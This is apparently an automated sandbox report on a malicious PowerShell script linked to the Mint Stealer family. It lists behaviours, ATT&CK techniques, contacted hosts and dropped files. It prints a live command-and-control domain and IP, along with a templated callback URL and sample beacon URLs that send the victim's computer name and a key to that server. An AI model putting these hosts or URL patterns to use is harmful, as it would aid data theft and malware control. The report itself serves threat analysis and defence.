Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ryOpDCeOHz.ps111%ReversingLabsScript-Python.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crlft.com/prl/pMicT0%Avira URL Cloudsafe
http://gidcldeaccadneh.top100%Avira URL Cloudmalware
http://www.quovadis.bm00%Avira URL Cloudsafe
https://go.micro0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints130%Avira URL Cloudsafe
http://crl.X0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
64.233.185.105
truefalse
    		high
    gidcldeaccadneh.top
    		206.188.196.37
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.Xpowershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5410C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A541403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5413EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A54109F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.google.compowershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://apis.google.compowershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.pngpowershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crlft.com/prl/pMicTpowershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://go.micropowershell.exe, 00000000.00000002.6017075770.000001A541BAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schema.org/WebPageXzpowershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.quovadis.bm0powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://gidcldeaccadneh.toppowershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.pngXzpowershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              206.188.196.37
                                                                                              		gidcldeaccadneh.topUnited States
                                                                                              		55002DEFENSE-NETUStrue
                                                                                              64.233.185.105
                                                                                              		www.google.comUnited States
                                                                                              		15169GOOGLEUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1556310
                                                                                              Start date and time:2024-11-15 09:32:00 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 5m 19s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                              Run name:Suspected VM Detection
                                                                                              Number of analysed new started processes analysed:3
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:ryOpDCeOHz.ps1
                                                                                              Detection:MAL
                                                                                              Classification:mal72.evad.winPS1@2/7@2/2
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 93%
                                                                                              • Number of executed functions: 12
                                                                                              • Number of non-executed functions: 8
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .ps1
                                                                                              • Stop behavior analysis, all processes terminated

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                                                                              • Excluded domains from analysis (whitelisted): settings-win.data.microsoft.com, ctldl.windowsupdate.com
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7652 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              • VT rate limit hit for: ryOpDCeOHz.ps1

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              03:34:03API Interceptor31x Sleep call for process: powershell.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              206.188.196.37Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21
                                                                                              Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • gidcldeaccadneh.top/xuceh2n0lohtr.php?id=user-PC&key=57894837609&s=mints21
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/06c2d9sea1htr.php?id=computer&key=21152678751&s=mints13
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/276lca0oqkhtr.php?id=computer&key=55933565450&s=mints13
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/9mtlfardohhtr.php?id=user-PC&key=89774062466&s=mints13
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/5nyvigqht1htr.php?id=user-PC&key=79290330744&s=mints13
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/fpmerz30vyhtr.php?id=computer&key=44154737485&s=mints13
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • gidcldeaccadneh.top/se6y3fnhkvhtr.php?id=user-PC&key=69185160161&s=mints13
                                                                                              Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                                                              • jcgijjkddehkfli.top/2le1khmz8ghtr.php?id=computer&key=10263897153&s=mints13

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              gidcldeaccadneh.topFdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • 206.188.196.37
                                                                                              Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              DEFENSE-NETUSFdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • 206.188.196.37
                                                                                              Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 206.188.196.37
                                                                                              https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                                                                                              • 107.162.179.174

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:@...e...........................................................

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21ro0wcs.5ue.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckwdadwn.cpt.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvb4me13.rd2.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1kwd1m2.ucb.ps1

                                                                                              Download File
